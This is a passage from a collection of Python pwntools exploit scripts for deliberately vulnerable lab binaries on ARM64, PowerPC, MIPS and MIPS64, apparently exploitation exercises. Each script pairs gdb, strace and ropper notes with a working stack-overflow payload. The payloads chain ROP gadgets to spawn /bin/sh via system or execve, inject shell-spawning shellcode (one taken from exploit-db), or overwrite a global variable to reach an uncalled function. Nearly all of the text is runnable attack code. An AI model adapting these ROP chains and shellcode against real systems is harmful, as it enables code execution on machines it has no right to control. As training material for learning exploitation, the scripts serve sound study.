p64(ld_s0_s1_addr) 79 | payload += 'b' * 8 80 | payload += p64(system_addr) # s0 81 | payload += p64(jump_s0_addr) # s1 82 | payload += p64(0) # s2 83 | payload += 'c' * 8 84 | payload += p64(ld_a0_sp_0x38_jump_s1_addr) # ra 85 | payload += 'd' * 0x38 86 | payload += p64(bin_sh_addr) 87 | 88 | p.readuntil('> ') 89 | p.write(payload) 90 | p.interactive() 91 | -------------------------------------------------------------------------------- /pwn/arm64/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble main 5 | Dump of assembler code for function main: 6 | 0x00000000004006c0 <+0>: stp x29, x30, [sp, #-32]! 7 | ... 8 | 0x00000000004006d8 <+24>: ldp x29, x30, [sp], #32 9 | 0x00000000004006dc <+28>: ret 10 | End of assembler dump. 11 | (gdb) b vulnerable 12 | Breakpoint 1 at 0x40067c: file src/05-shellcode-dynamic.c, line 6. 13 | (gdb) b *0x00000000004006d8 14 | Breakpoint 2 at 0x4006d8: file src/05-shellcode-dynamic.c, line 20. 15 | (gdb) c 16 | Continuing. 17 | 18 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 19 | 6 printf("> "); 20 | (gdb) p &buffer[0] 21 | $1 = 0x40007ffd80 "" 22 | (gdb) c 23 | Continuing. 24 | 25 | Breakpoint 2, main (argc=1650614882, argv=0x6262626262626262) at src/05-shellcode-dynamic.c:20 26 | 20 } 27 | (gdb) i r $sp 28 | sp 0x40007ffe00 0x40007ffe00 29 | """ 30 | 31 | """ 32 | $ qemu-aarch64 -L /usr/aarch64-linux-gnu/ -strace ./bin/arm64/05-shellcode-dynamic 33 | ... 34 | 20548 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 20548 mmap(NULL,1413976,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0000004000852000 37 | ... 38 | """ 39 | 40 | """ 41 | $ ropper --nocolor --file /usr/aarch64-linux-gnu/lib/libc-2.27.so 42 | 0x0003c424: ldp x19, x20, [sp, #0x10]; ldp x21, x22, [sp, #0x20]; ldp x23, x24, [sp, #0x30]; ldp x27, x28, [sp, #0x50]; ldp x29, x30, [sp], #0x70; ret; 43 | 0x000f32e4: mov x4, x20; mov x3, x24; mov x0, x23; blr x22; 44 | 0x0003eeac: add x0, sp, #0x50; ldr x4, [x4]; eor x3, x3, x4; blr x3; 45 | 0x0002071c: blr x0; 46 | """ 47 | 48 | import struct 49 | import sys 50 | 51 | from pwn import * 52 | 53 | context(arch='aarch64', os='linux', endian='little', word_size=64) 54 | 55 | binary_path = './bin/arm64/05-shellcode-dynamic' 56 | libc_path = '/usr/aarch64-linux-gnu/lib/libc-2.27.so' 57 | 58 | saved_x30_addr = 0x40007ffe00 + 8 59 | buffer_addr = 0x40007ffd80 60 | libc_addr = 0x0000004000852000 61 | 62 | ldp_x_many_ret_addr = libc_addr + 0x0003c424 63 | mov_x4_x20_x3_x24_blr_x22_addr = libc_addr + 0x000f32e4 64 | add_x0_sp_0x50_blr_x3_addr = libc_addr + 0x0003eeac 65 | blr_x0_addr = libc_addr + 0x0002071c 66 | 67 | libc = ELF(libc_path) 68 | null_addr = libc_addr + libc.search(p64(0)).next() 69 | 70 | shellcode = asm(shellcraft.sh()) 71 | 72 | p = process(binary_path) 73 | #p = gdb.debug([binary_path]) 74 | 75 | payload = '' 76 | payload += 'a' * (saved_x30_addr - buffer_addr) 77 | payload += p64(ldp_x_many_ret_addr) 78 | payload += 'b' * 16 79 | # <- $sp 80 | payload += p64(0) # x29 81 | payload += p64(mov_x4_x20_x3_x24_blr_x22_addr) # x30 82 | payload += p64(0) # x19 83 | payload += p64(null_addr) # x20 -> x4 84 | payload += p64(0) # x21 85 | payload += p64(add_x0_sp_0x50_blr_x3_addr) # x22 86 | payload += p64(0) # x23 87 | payload += p64(blr_x0_addr) # x24 -> x3 88 | payload += 'd' * 0x10 89 | payload += p64(0) # x27 90 | payload += p64(0) # x28 91 | payload += 'e' * 0x10 92 | # <- $sp 93 | payload += 'f' * 0x50 94 | payload += shellcode 95 | 96 | p.readuntil('> ') 97 | p.write(payload) 98 | p.interactive() 99 | -------------------------------------------------------------------------------- /pwn/ppc/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000052c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x10000580 <+84>: lwz r0,4(r11) 9 | 0x10000584 <+88>: mtlr r0 10 | 0x10000588 <+92>: lwz r31,-4(r11) 11 | 0x1000058c <+96>: mr r1,r11 12 | 0x10000590 <+100>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000540: file src/07-execve-rop.c, line 6. 16 | (gdb) b *0x10000580 17 | Breakpoint 2 at 0x10000580: file src/07-execve-rop.c, line 11. 18 | (gdb) b *0x10000590 19 | Breakpoint 3 at 0x10000590: file src/07-execve-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0xffffdda8 "\377\377\336\b" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x10000580 in vulnerable () at src/07-execve-rop.c:11 31 | 11 } 32 | (gdb) p/x $r11+4 33 | $2 = 0xffffde34 34 | (gdb) c 35 | Continuing. 36 | 37 | Breakpoint 3, 0x10000590 in vulnerable () at src/07-execve-rop.c:11 38 | 11 } 39 | (gdb) i r $r1 40 | r1 0xffffde30 4294958640 41 | """ 42 | 43 | """ 44 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/07-execve-rop 45 | ... 46 | 19357 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 47 | ... 48 | 19357 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 49 | ... 50 | """ 51 | 52 | """ 53 | $ ropper --nocolor --inst-count 9 --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 54 | 0x00021d00: lwz r0, 0x34(r1); lwz r27, 0x1c(r1); lwz r28, 0x20(r1); lwz r29, 0x24(r1); lwz r30, 0x28(r1); lwz r31, 0x2c(r1); mtlr r0; addi r1, r1, 0x30; blr; 55 | 0x0003c414: mr r5, r27; mr r4, r31; mr r3, r29; mtctr r28; bctrl; 56 | 0x000cc3e0: li r0, 0xb; sc; 57 | """ 58 | 59 | import struct 60 | import sys 61 | 62 | from pwn import * 63 | 64 | context(arch='powerpc', os='linux', endian='big', word_size=32) 65 | 66 | binary_path = './bin/ppc/07-execve-rop' 67 | libc_path = '/usr/powerpc-linux-gnu/lib/libc-2.27.so' 68 | 69 | saved_pc_addr = 0xffffde34 70 | buffer_addr = 0xffffdda8 71 | libc_addr = 0x0fe2c000 72 | 73 | lwz_many_addr = libc_addr + 0x00021d00 74 | mr_many_addr = libc_addr + 0x0003c414 75 | li_r0_0xb_sc_addr = libc_addr + 0x000cc3e0 76 | 77 | libc = ELF(libc_path) 78 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 79 | 80 | p = process(binary_path) 81 | #p = gdb.debug([binary_path]) 82 | 83 | payload = '' 84 | payload += 'a' * (saved_pc_addr - buffer_addr) 85 | payload += p32(lwz_many_addr) 86 | # <- $r1 + 8 87 | payload += 'b' * (0x1c - 8) 88 | payload += p32(0) # r27 -> r5 89 | payload += p32(li_r0_0xb_sc_addr) # r28 -> gadget 90 | payload += p32(bin_sh_addr) # r29 -> r3 91 | payload += p32(0) # r30 92 | payload += p32(0) # r31 -> r4 93 | payload += 'c' * 4 94 | payload += p32(mr_many_addr) # r0 95 | # <- $r1 + 8 96 | 97 | p.readuntil('> ') 98 | p.write(payload) 99 | p.interactive() 100 | -------------------------------------------------------------------------------- /pwn/mips64/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000b80 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000b84 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000bf8 <+120>: ld ra,152(sp) 10 | 0x0000000120000bfc <+124>: ld s8,144(sp) 11 | 0x0000000120000c00 <+128>: ld gp,136(sp) 12 | 0x0000000120000c04 <+132>: daddiu sp,sp,160 13 | 0x0000000120000c08 <+136>: jr ra 14 | 0x0000000120000c0c <+140>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000ba0: file src/07-execve-rop.c, line 6. 18 | (gdb) b *0x0000000120000bf8 19 | Breakpoint 2 at 0x120000bf8: file src/07-execve-rop.c, line 11. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 24 | 6 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0x40007ffd70 "" 27 | (gdb) p/x $sp+152 28 | $2 = 0x40007ffe08 29 | """ 30 | 31 | """ 32 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/07-execve-rop 33 | ... 34 | 15754 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 35 | ... 36 | 15754 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 37 | """ 38 | 39 | """ 40 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 41 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 42 | 0x00000000000563ac: move $t9, $s1; jalr $t9; move $a2, $s2; 43 | 0x0000000000105c8c: ld $v0, 0x80($sp); ld $t9, 0x20($sp); move $a1, $zero; jalr $t9; move $a0, $s2; 44 | 0x0000000000058b34: syscall; jr $ra; nop; 45 | """ 46 | 47 | import struct 48 | import sys 49 | 50 | from pwn import * 51 | 52 | context(arch='mips64', os='linux', endian='big', word_size=64) 53 | 54 | binary_path = './bin/mips64/07-execve-rop' 55 | libc_path = '/usr/mips64-linux-gnuabi64/lib/libc-2.27.so' 56 | 57 | ra_saved_addr = 0x40007ffe08 58 | buffer_addr = 0x40007ffd70 59 | libc_addr = 0x000000400085e000 60 | 61 | ld_s0_s1_s2_addr = libc_addr + 0x00000000000e941c 62 | move_a2_s2_jump_s1_addr = libc_addr + 0x00000000000563ac 63 | ld_v0_move_a1_0_a0_s2_jump_sp_0x20_addr = libc_addr + 0x0000000000105c8c 64 | syscall_addr = libc_addr + 0x0000000000058b34 65 | 66 | libc = ELF(libc_path) 67 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 68 | 69 | p = process(binary_path) 70 | #p = gdb.debug([binary_path]) 71 | 72 | payload = '' 73 | payload += 'a' * (ra_saved_addr - buffer_addr) 74 | payload += p64(ld_s0_s1_s2_addr) 75 | 76 | payload += 'b' * 8 77 | payload += p64(0) # s0 78 | payload += p64(ld_s0_s1_s2_addr) # s1 79 | payload += p64(0) # s2 80 | payload += 'c' * 8 81 | payload += p64(move_a2_s2_jump_s1_addr) # ra 82 | 83 | payload += 'e' * 8 84 | payload += p64(0) # s0 85 | payload += p64(0) # s1 86 | payload += p64(bin_sh_addr) # s2 87 | payload += 'f' * 8 88 | payload += p64(ld_v0_move_a1_0_a0_s2_jump_sp_0x20_addr) # ra 89 | 90 | payload += 'g' * 0x20 91 | payload += p64(syscall_addr) 92 | payload += 'e' * (0x80 - 8 - 0x20) 93 | payload += p64(5057) # execve 94 | 95 | p.readuntil('> ') 96 | p.write(payload) 97 | p.interactive() 98 | -------------------------------------------------------------------------------- /pwn/mips/07-execve-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x00400780 <+0>: addiu sp,sp,-160 7 | 0x00400784 <+4>: sw ra,156(sp) 8 | ... 9 | 0x00400804 <+132>: lw ra,156(sp) 10 | 0x00400808 <+136>: lw s8,152(sp) 11 | 0x0040080c <+140>: addiu sp,sp,160 12 | 0x00400810 <+144>: jr ra 13 | 0x00400814 <+148>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x40079c: file src/07-execve-rop.c, line 6. 17 | (gdb) b *0x00400804 18 | Breakpoint 2 at 0x400804: file src/07-execve-rop.c, line 11. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/07-execve-rop.c:6 23 | 6 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x7fffef58 "\177~\272X\177~\243\f\177|\210D" 26 | (gdb) p/x $sp+156 27 | $2 = 0x7fffefdc 28 | """ 29 | 30 | """ 31 | $ qemu-mips -L /usr/mips-linux-gnu/ -strace ./bin/mips/07-execve-rop 32 | ... 33 | 5552 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 34 | ... 35 | 5552 mmap2(NULL,1638448,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x7f615000 36 | ... 37 | """ 38 | 39 | """ 40 | $ ropper --nocolor --file /usr/mips-linux-gnu/lib/libc-2.27.so 41 | 0x0001b1e8: lw $ra, 0x24($sp); lw $s2, 0x20($sp); lw $s1, 0x1c($sp); lw $s0, 0x18($sp); jr $ra; addiu $sp, $sp, 0x28; 42 | 0x0001ccf4: move $t9, $s0; jalr $t9; move $a0, $s1; 43 | 0x00096018: move $t9, $s0; jalr $t9; move $a1, $s1; 44 | 0x000322ac: move $t9, $s1; jalr $t9; move $a2, $s2; 45 | 0x000f64b0: lw $v0, 0x14($sp); syscall; jr $ra; move $v1, $a3; 46 | """ 47 | 48 | import struct 49 | import sys 50 | 51 | from pwn import * 52 | 53 | context(arch='mips', os='linux', endian='big', word_size=32) 54 | 55 | binary_path = './bin/mips/07-execve-rop' 56 | libc_path = '/usr/mips-linux-gnu/lib/libc-2.27.so' 57 | 58 | ra_saved_addr = 0x7fffefdc 59 | buffer_addr = 0x7fffef58 60 | libc_addr = 0x7f615000 61 | 62 | lw_s0_s1_s2_addr = libc_addr + 0x0001b1e8 63 | move_a0_s1_jump_s0_addr = libc_addr + 0x0001ccf4 64 | move_a1_s1_jump_s0_addr = libc_addr + 0x00096018 65 | move_a2_s2_jump_s1_addr = libc_addr + 0x000322ac 66 | lw_v0_syscall_addr = libc_addr + 0x000f64b0 67 | 68 | libc = ELF(libc_path) 69 | bin_sh_addr = libc_addr + libc.search('/bin/sh\x00').next() 70 | 71 | p = process(binary_path) 72 | #p = gdb.debug([binary_path]) 73 | 74 | payload = '' 75 | payload += 'a' * (ra_saved_addr - buffer_addr) 76 | payload += p32(lw_s0_s1_s2_addr) 77 | 78 | payload += 'b' * 0x18 79 | payload += p32(lw_s0_s1_s2_addr) # s0 80 | payload += p32(bin_sh_addr) # s1 81 | payload += p32(0) # s2 82 | payload += p32(move_a0_s1_jump_s0_addr) # ra 83 | 84 | payload += 'c' * 0x18 85 | payload += p32(lw_s0_s1_s2_addr) # s0 86 | payload += p32(0) # s1 87 | payload += p32(0) # s2 88 | payload += p32(move_a1_s1_jump_s0_addr) # ra 89 | 90 | payload += 'd' * 0x18 91 | payload += p32(0) # s0 92 | payload += p32(lw_v0_syscall_addr) # s1 93 | payload += p32(0) # s2 94 | payload += p32(move_a2_s2_jump_s1_addr) # ra 95 | 96 | payload += 'e' * 0x14 97 | payload += p32(4011) # v0 98 | 99 | p.readuntil('> ') 100 | p.write(payload) 101 | p.interactive() 102 | -------------------------------------------------------------------------------- /pwn/mips64/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c00 <+0>: daddiu sp,sp,-160 7 | ... 8 | 0x0000000120000c78 <+120>: ld ra,152(sp) 9 | 0x0000000120000c7c <+124>: ld s8,144(sp) 10 | 0x0000000120000c80 <+128>: ld gp,136(sp) 11 | 0x0000000120000c84 <+132>: daddiu sp,sp,160 12 | 0x0000000120000c88 <+136>: jr ra 13 | 0x0000000120000c8c <+140>: nop 14 | End of assembler dump. 15 | (gdb) b vulnerable 16 | Breakpoint 1 at 0x120000c20: file src/08-overwrite-global.c, line 9. 17 | (gdb) b *0x0000000120000c78 18 | Breakpoint 2 at 0x120000c78: file src/08-overwrite-global.c, line 14. 19 | (gdb) c 20 | Continuing. 21 | 22 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9 23 | 9 printf("> "); 24 | (gdb) p &buffer[0] 25 | $1 = 0x40007ffd20 "" 26 | (gdb) c 27 | Continuing. 28 | 29 | Breakpoint 2, 0x0000000120000c78 in vulnerable () at src/08-overwrite-global.c:14 30 | 14 } 31 | (gdb) p/x $sp+152 32 | $2 = 0x40007ffdb8 33 | """ 34 | 35 | """ 36 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/08-overwrite-global 37 | ... 38 | 11254 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 39 | ... 40 | 11254 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 41 | """ 42 | 43 | """ 44 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 45 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 46 | 0x000000000008c3cc: ld $v0, 8($sp); ld $ra, 0x18($sp); jr $ra; daddiu $sp, $sp, 0x20; 47 | 0x000000000016b3dc: ld $ra, 0x18($sp); sd $v0, ($s0); ld $gp, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x20; 48 | 0x000000000006a82c: ld $t9, 0x18($sp); jalr $t9; nop; 49 | """ 50 | 51 | import struct 52 | import sys 53 | 54 | from pwn import * 55 | 56 | context(arch='mips64', os='linux', endian='big', word_size=64) 57 | 58 | binary_path = './bin/mips64/08-overwrite-global' 59 | 60 | ra_saved_addr = 0x40007ffdb8 61 | buffer_addr = 0x40007ffd20 62 | libc_addr = 0x000000400085e000 63 | 64 | ld_s0_s1_s2_addr = libc_addr + 0x00000000000e941c 65 | ld_v0_addr = libc_addr + 0x000000000008c3cc 66 | sd_v0_s0_addr = libc_addr + 0x000000000016b3dc 67 | ld_r9_jalr_r9_addr = libc_addr + 0x000000000006a82c 68 | 69 | binary = ELF(binary_path) 70 | not_called_addr = binary.symbols['not_called'] 71 | x_addr = binary.symbols['x'] 72 | 73 | p = process(binary_path) 74 | #p = gdb.debug([binary_path]) 75 | 76 | payload = '' 77 | payload += 'a' * (ra_saved_addr - buffer_addr) 78 | payload += p64(ld_s0_s1_s2_addr) 79 | 80 | payload += 'b' * 8 81 | payload += p64(x_addr) # s0 82 | payload += p64(0) # s1 83 | payload += p64(0) # s2 84 | payload += 'c' * 8 85 | payload += p64(ld_v0_addr) # ra 86 | 87 | payload += 'd' * 8 88 | payload += p64(0xdeadbabebeefc0de) # v0 89 | payload += 'e' * 8 90 | payload += p64(sd_v0_s0_addr) # ra 91 | 92 | payload += 'f' * 0x18 93 | payload += p64(ld_r9_jalr_r9_addr) # ra 94 | 95 | payload += 'g' * 0x18 96 | payload += p64(not_called_addr) # t9 97 | 98 | p.readuntil('> ') 99 | p.write(payload) 100 | p.interactive() 101 | -------------------------------------------------------------------------------- /pwn/mips64/05-shellcode-dynamic.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000120000c10 <+0>: daddiu sp,sp,-160 7 | 0x0000000120000c14 <+4>: sd ra,152(sp) 8 | ... 9 | 0x0000000120000c9c <+140>: ld ra,152(sp) 10 | 0x0000000120000ca0 <+144>: ld s8,144(sp) 11 | 0x0000000120000ca4 <+148>: ld gp,136(sp) 12 | 0x0000000120000ca8 <+152>: daddiu sp,sp,160 13 | 0x0000000120000cac <+156>: jr ra 14 | 0x0000000120000cb0 <+160>: nop 15 | End of assembler dump. 16 | (gdb) b vulnerable 17 | Breakpoint 1 at 0x120000c30: file src/05-shellcode-dynamic.c, line 6. 18 | (gdb) b *0x0000000120000c9c 19 | Breakpoint 2 at 0x120000c9c: file src/05-shellcode-dynamic.c, line 13. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/05-shellcode-dynamic.c:6 24 | warning: Source file is more recent than executable. 25 | 6 printf("> "); 26 | (gdb) p &buffer[0] 27 | $1 = 0x40007ffd70 "" 28 | (gdb) c 29 | Continuing. 30 | 31 | Breakpoint 2, 0x0000000120000c9c in vulnerable () at src/05-shellcode-dynamic.c:13 32 | 13 usleep(1000); 33 | (gdb) p/x $sp+152 34 | $2 = 0x40007ffe08 35 | """ 36 | 37 | """ 38 | $ qemu-mips64 -L /usr/mips64-linux-gnuabi64/ -strace ./bin/mips64/05-shellcode-dynamic 39 | ... 40 | 9557 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 41 | ... 42 | 9557 mmap(NULL,1880864,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x000000400085e000 43 | """ 44 | 45 | """ 46 | $ ropper --nocolor --file /usr/mips64-linux-gnuabi64/lib/libc-2.27.so 47 | 0x00000000000e941c: ld $ra, 0x28($sp); ld $s2, 0x18($sp); ld $s1, 0x10($sp); ld $s0, 8($sp); jr $ra; daddiu $sp, $sp, 0x30; 48 | 0x0000000000168aa8: move $t9, $s2; jalr $t9; daddiu $s0, $sp, 0x18; 49 | 0x0000000000082824: move $t9, $s0; jalr $t9; nop; 50 | """ 51 | 52 | import struct 53 | import sys 54 | 55 | from pwn import * 56 | 57 | context(arch='mips64', os='linux', endian='big', word_size=64) 58 | 59 | binary_path = './bin/mips64/05-shellcode-dynamic' 60 | 61 | ra_saved_addr = 0x40007ffe08 62 | buffer_addr = 0x40007ffd70 63 | libc_addr = 0x000000400085e000 64 | 65 | ld_s0_s2_addr = libc_addr + 0x00000000000e941c 66 | daddui_s0_sp_0x18_jump_s2_addr = libc_addr + 0x0000000000168aa8 67 | jump_s0_addr = libc_addr + 0x0000000000082824 68 | 69 | # Adapted from https://www.exploit-db.com/exploits/45287 70 | shellcode = \ 71 | "\x62\x2f\x0c\x3c"[::-1] + \ 72 | "\x6e\x69\x8c\x35"[::-1] + \ 73 | "\xf4\xff\xac\xaf"[::-1] + \ 74 | "\x73\x2f\x0d\x3c"[::-1] + \ 75 | "\x00\x68\xad\x35"[::-1] + \ 76 | "\xf8\xff\xad\xaf"[::-1] + \ 77 | "\xf4\xff\xa4\x67"[::-1] + \ 78 | "\xff\xff\x05\x28"[::-1] + \ 79 | "\xff\xff\x06\x28"[::-1] + \ 80 | "\xc1\x13\x02\x24"[::-1] + \ 81 | "\x0c\x01\x01\x01"[::-1] 82 | 83 | p = process(binary_path) 84 | #p = gdb.debug([binary_path]) 85 | 86 | payload = '' 87 | payload += 'a' * (ra_saved_addr - buffer_addr) 88 | payload += p64(ld_s0_s2_addr) 89 | payload += 'b' * 8 90 | payload += p64(0) # s0 91 | payload += p64(0) # s1 92 | payload += p64(jump_s0_addr) # s2 93 | payload += 'c' * 8 94 | payload += p64(daddui_s0_sp_0x18_jump_s2_addr) # ra 95 | payload += 'd' * 0x18 96 | payload += shellcode 97 | 98 | p.readuntil('> ') 99 | p.write(payload) 100 | p.interactive() 101 | -------------------------------------------------------------------------------- /pwn/ppc/08-overwrite-global.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x1000054c <+0>: stwu r1,-144(r1) 7 | ... 8 | 0x100005a0 <+84>: lwz r0,4(r11) 9 | 0x100005a4 <+88>: mtlr r0 10 | 0x100005a8 <+92>: lwz r31,-4(r11) 11 | 0x100005ac <+96>: mr r1,r11 12 | 0x100005b0 <+100>: blr 13 | End of assembler dump. 14 | (gdb) b vulnerable 15 | Breakpoint 1 at 0x10000560: file src/08-overwrite-global.c, line 9. 16 | (gdb) b *0x100005a0 17 | Breakpoint 2 at 0x100005a0: file src/08-overwrite-global.c, line 14. 18 | (gdb) b *0x100005b0 19 | Breakpoint 3 at 0x100005b0: file src/08-overwrite-global.c, line 14. 20 | (gdb) c 21 | Continuing. 22 | 23 | Breakpoint 1, vulnerable () at src/08-overwrite-global.c:9 24 | 9 printf("> "); 25 | (gdb) p &buffer[0] 26 | $1 = 0xffffdd58 "\377\377" 27 | (gdb) c 28 | Continuing. 29 | 30 | Breakpoint 2, 0x100005a0 in vulnerable () at src/08-overwrite-global.c:14 31 | 14 } 32 | (gdb) p/x $r11+4 33 | $2 = 0xffffdde4 34 | (gdb) c 35 | Continuing. 36 | 37 | Breakpoint 3, 0x100005b0 in vulnerable () at src/08-overwrite-global.c:14 38 | 14 } 39 | (gdb) i r $r1 40 | r1 0xffffdde0 4294958560 41 | """ 42 | 43 | """ 44 | $ qemu-ppc -L /usr/powerpc-linux-gnu/ -strace ./bin/ppc/08-overwrite-global 45 | ... 46 | 19357 openat(AT_FDCWD,"/lib/libc.so.6",O_RDONLY|O_CLOEXEC) = 3 47 | ... 48 | 19357 mmap2(0x0fe2c000,1848680,PROT_EXEC|PROT_READ,MAP_PRIVATE|MAP_DENYWRITE,3,0) = 0x0fe2c000 49 | ... 50 | """ 51 | 52 | """ 53 | $ ropper --nocolor --inst-count 9 --file /usr/powerpc-linux-gnu/lib/libc-2.27.so 54 | 0x00146050: lwz r0, 0x44(r1); lwz r25, 0x24(r1); lwz r30, 0x38(r1); addi r1, r1, 0x40; mtlr r0; blr; 55 | 0x0013f2bc: lwz r0, 0x34(r1); lwz r27, 0x1c(r1); lwz r30, 0x28(r1); addi r1, r1, 0x30; mtlr r0; blr; 56 | 0x0008a5ec: lwz r29, 0x14(r1); lwz r0, 0x24(r1); lwz r30, 0x18(r1); addi r1, r1, 0x20; mtlr r0; blr; 57 | 0x000b6ce4: stw r29, 0(r27); mtctr r25; bctr; 58 | """ 59 | 60 | import struct 61 | import sys 62 | 63 | from pwn import * 64 | 65 | context(arch='powerpc', os='linux', endian='big', word_size=32) 66 | 67 | binary_path = './bin/ppc/08-overwrite-global' 68 | 69 | saved_pc_addr = 0xffffdde4 70 | buffer_addr = 0xffffdd58 71 | libc_addr = 0x0fe2c000 72 | 73 | lwz_r25_addr = libc_addr + 0x00146050 74 | lwz_r27_addr = libc_addr + 0x0013f2bc 75 | lwz_r29_addr = libc_addr + 0x0008a5ec 76 | stw_r29_r27_mtctr_r25_addr = libc_addr + 0x000b6ce4 77 | 78 | binary = ELF(binary_path) 79 | not_called_addr = binary.symbols['not_called'] 80 | x_addr = binary.symbols['x'] 81 | 82 | p = process(binary_path) 83 | #p = gdb.debug([binary_path]) 84 | 85 | payload = '' 86 | payload += 'a' * (saved_pc_addr - buffer_addr) 87 | payload += p32(lwz_r25_addr) 88 | # <- $r1 + 8 89 | payload += 'b' * (0x24 - 8) 90 | payload += p32(not_called_addr) # r25 91 | payload += 'c' * (0x44 - 0x24 - 4) 92 | payload += p32(lwz_r27_addr) # r0 93 | # <- $r1 + 8 94 | payload += 'e' * (0x1c - 8) 95 | payload += p32(x_addr) # r27 96 | payload += 'f' * (0x34 - 0x1c - 4) 97 | payload += p32(lwz_r29_addr) # r0 98 | # <- $r1 + 8 99 | payload += 'f' * (0x14 - 8) 100 | payload += p32(0xbeefc0de) # r29 101 | payload += 'h' * (0x24 - 0x14 - 4) 102 | payload += p32(stw_r29_r27_mtctr_r25_addr) # r0 103 | 104 | p.readuntil('> ') 105 | p.write(payload) 106 | p.interactive() 107 | -------------------------------------------------------------------------------- /pwn/ppc64/06-system-rop.py: -------------------------------------------------------------------------------- 1 | #!/usr/bin/python 2 | 3 | """ 4 | (gdb) disassemble vulnerable 5 | Dump of assembler code for function vulnerable: 6 | 0x0000000010000734 <+0>: mflr r0 7 | 0x0000000010000738 <+4>: std r0,16(r1) 8 | ... 9 | 0x0000000010000794 <+96>: ld r0,16(r1) 10 | 0x0000000010000798 <+100>: mtlr r0 11 | 0x000000001000079c <+104>: ld r31,-8(r1) 12 | 0x00000000100007a0 <+108>: blr 13 | 0x00000000100007a4 <+112>: .long 0x0 14 | 0x00000000100007a8 <+116>: .long 0x1 15 | 0x00000000100007ac <+120>: lwz r0,1(r1) 16 | End of assembler dump. 17 | (gdb) b vulnerable 18 | Breakpoint 1 at 0x10000748: file src/06-system-rop.c, line 6. 19 | (gdb) b *0x0000000010000794 20 | Breakpoint 2 at 0x10000794: file src/06-system-rop.c, line 11. 21 | (gdb) b *0x00000000100007a0 22 | Breakpoint 3 at 0x100007a0: file src/06-system-rop.c, line 11. 23 | (gdb) c 24 | Continuing. 25 | 26 | Breakpoint 1, vulnerable () at src/06-system-rop.c:6 27 | 6 printf("> "); 28 | (gdb) p &buffer[0] 29 | $1 = 0x40007ff940 "" 30 | (gdb) c 31 | Continuing. 